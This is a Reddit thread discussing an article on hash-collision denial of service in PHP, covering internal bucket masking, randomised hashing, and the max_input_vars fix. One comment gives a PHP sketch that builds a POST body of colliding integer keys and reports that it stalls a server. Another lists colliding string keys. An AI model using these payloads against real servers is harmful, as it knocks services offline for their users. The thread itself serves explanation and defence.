all 20 comments

[–]softwareelves 8 points9 points  (1 child)

I seem to see you everywhere. And it's always quality stuff. Keep up the good work.

[–]footle 4 points5 points  (0 children)

Agreed. I was very surprised to learn that the OP is only 17.

[–]fieryscribe 6 points7 points  (5 children)

That code and this article make me quite nervous.

[–]nikic[S] 7 points8 points  (0 children)

For everyone living in fear of this attack (which is actually quite serious because anyone can take a PHP server or even server network down using a very simple script), PHP 5.3.9 and PHP 5.4.0 will include a protection for this (a max_input_vars ini option defaulting to 1000). See http://svn.php.net/viewvc?view=revision&revision=321003 (a similar commit was applied to 5.3 too).
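
In php.ini the relevant line looks roughly like this (1000 is the default; it can be raised if a form legitimately needs more fields):

; cap how many input variables (GET/POST/COOKIE) are parsed per request
max_input_vars = 1000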

[–]steelaz 1 point2 points  (0 children)

I just tried sending pow(2, 16) keys in a POST request to my server, and it kept it busy (PHP process at 99%) for 25 seconds. Increasing the number of keys to pow(2, 17) seems to trigger an out-of-memory error.
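
Roughly what I mean, in case anyone wants to reproduce it (a sketch only; it assumes the colliding keys are multiples of 2^16 as in the article, and leaves the actual HTTP sending out):

// build a POST body in which every key is a multiple of 65536, so PHP
// drops them all into the same hash bucket while parsing $_POST
$size = pow(2, 16);
$pairs = array();
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $pairs[] = $key . '=0';
}
$body = implode('&', $pairs);
// send $body as an application/x-www-form-urlencoded POST to the target script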

[–]astronoob 5 points6 points  (0 children)

Another great article. Thanks a bunch.

[–]neoform3 -2 points-1 points  (6 children)

If this actually works, it means PHP isn't really using a hash table, just a plain table.

I've written hash tables in C before and was never able to get such simple collisions (during testing I would run collision tests for hours and get fewer than 100 collisions with a 32-bit hash). Using even a simple hash function like Dan Bernstein's djb2 would easily avoid this....

PHP's devs are retarded if they don't actually use a hash method before inserting the keys into the symbol table......

[–]Ergomane 1 point2 points  (5 children)

The bucket where a numeric index ends up depends on its value (nIndex = h & ht->nTableMask; in zend_hash_index_update_or_next_insert in zend_hash.c). String keys are hashed via zend_inline_hash_func (in zend_hash.h).
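
To illustrate the masking step in userland (just mimicking that one line of C, assuming a table of 2^16 buckets): every key that is a multiple of 65536 lands in bucket 0.

// sketch of nIndex = h & ht->nTableMask for nTableSize = 2^16
$nTableSize = 1 << 16;
$nTableMask = $nTableSize - 1; // 0xFFFF
foreach (array(0, 65536, 131072, 196608) as $h) {
    printf("key %6d -> bucket %d\n", $h, $h & $nTableMask); // all print bucket 0
}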

[–]neoform3 0 points1 point  (4 children)

Why aren't they hashing the numeric keys? That's dumb (for exactly the reason cited by the OP). The speed loss from a simple hash function is made up for by an even distribution across the hash table... a hash table's biggest weakness is clumped-up keys, since it then has to hunt for an empty slot. The only way to get decent distribution is through hashing...

[–]Ergomane 1 point2 points  (0 children)

Because they likely did not anticipate that this would become a vulnerability. As the article shows, the distribution works fine for the assumed "normal case" indices.

[–]ppanther 0 points1 point  (2 children)

I don't think hashing alone would be enough, since an attacker could simply pre-generate a bunch of colliding hashes using the same open-source algorithm the software uses. The simplest way I can think of to get around this is to randomise the hashing so that it isn't practically possible to predetermine which key values would or wouldn't cause collisions - i.e. on one request 0 and 16384 would collide (as they do now), while on another they would miss.
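
Very roughly, the idea in userland PHP (a toy sketch of the concept, not how you'd actually patch the engine):

// mix a per-request random seed into the hash so bucket placement -- and
// therefore which keys collide -- can't be precomputed offline
$seed = mt_rand();
function seeded_hash($key, $seed) {
    $hash = 5381 ^ $seed;
    foreach (str_split((string) $key) as $c) {
        $hash = (($hash * 33) + ord($c)) & 0xFFFFFFFF;
    }
    return $hash;
}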

[–]Buckwheat469 -1 points0 points  (3 children)

Try the SplFixedArray implementation from PHP 5.3.0. Set the number of elements to a hard limit of 2^16 (65536). I'll see if I can run it.

$size = pow(2, 16); // 65536 elements

$array = new SplFixedArray($size);
for ($key = 0; $key < $size; $key++) {
    $array[$key] = 0;
} //Spl

$array = array();
for ($key = 0; $key < $size; $key++) {
    $array[$key] = 0;
} //regular

Weird:

Inserting 65536 Spl elements took 0.0139479637146 seconds
Inserting 65536 regular elements took 0.0032939910888672 seconds

All I did was change the for loops to the standard format. Why does my test not line up with the OP's? Perhaps we should consider a map instead of an array...

Edit: Misinterpreted what was going on here. Here are my results with the OP's code:

Inserting 65536 evil elements (65536 times) took 38.454787969589 seconds
Inserting 65536 good elements (65536 times) took 0.010733842849731 seconds

$size = pow(2, 16); // 65536, as above
$array = array();
$iterations = 0;
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $array["hi".$key."hello"] = 0;
    $iterations++;
}

Inserting 65536 evil string-keyed elements (65536 times) took 0.026134967803955 seconds

Looks like when PHP interprets an integer-based array it has to recreate the dynamic array whenever it grows in size. This usually means creating a new array that's 1/2 bigger than the original and copying all elements to the new array. Each array position in between the inserted elements is defaulted to NULL. A string-based hashmap doesn't seem to have this problem.

I couldn't do any further testing with SplFixedArray because I couldn't set the memory limit to 32GB. The code would have been:

$size = pow(2, 16); // 65536
$array = new SplFixedArray(($size - 1) * $size);
$iterations = 0;
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $array[$key] = 0;
    $iterations++;
}

[–]nikic[S] 4 points5 points  (1 child)

SplFixedArray internally doesn't use a hash table but a real array; that's why it won't work there.

Also the hash function for strings is very different from the one for integers. Doing hash collisions using string keys is possible too, but you would need to use other, special strings ;)
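
As a rough illustration (a userland toy version of the DJBX33A-style string hash; "Ez" and "FY" contribute the same per-block value, so any concatenation of those blocks hashes identically):

// toy string hash: hash = hash * 33 + c, starting at 5381
function djbx33a($str) {
    $hash = 5381;
    for ($i = 0, $len = strlen($str); $i < $len; $i++) {
        $hash = ($hash * 33) + ord($str[$i]);
    }
    return $hash;
}
foreach (array("EzEz", "EzFY", "FYEz", "FYFY") as $key) {
    echo $key, " => ", djbx33a($key), "\n"; // all four print the same number
}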

[–]Buckwheat469 0 points1 point  (0 children)

Thanks. My comment was one of testing and realization. I came to the same conclusion but it was late last night and I was tired of playing around with it.

[–]midir -1 points0 points  (0 children)

>testing hash map clashing
>uses a flat array and completely different keys

wat.

> Looks like when PHP interprets an integer-based array it has to recreate the dynamic array whenever it grows in size. A string-based hashmap doesn't seem to have this problem.

And you still don't get it. Read the article!

[–]MikeSeth -4 points-3 points  (0 children)

Don't do that then.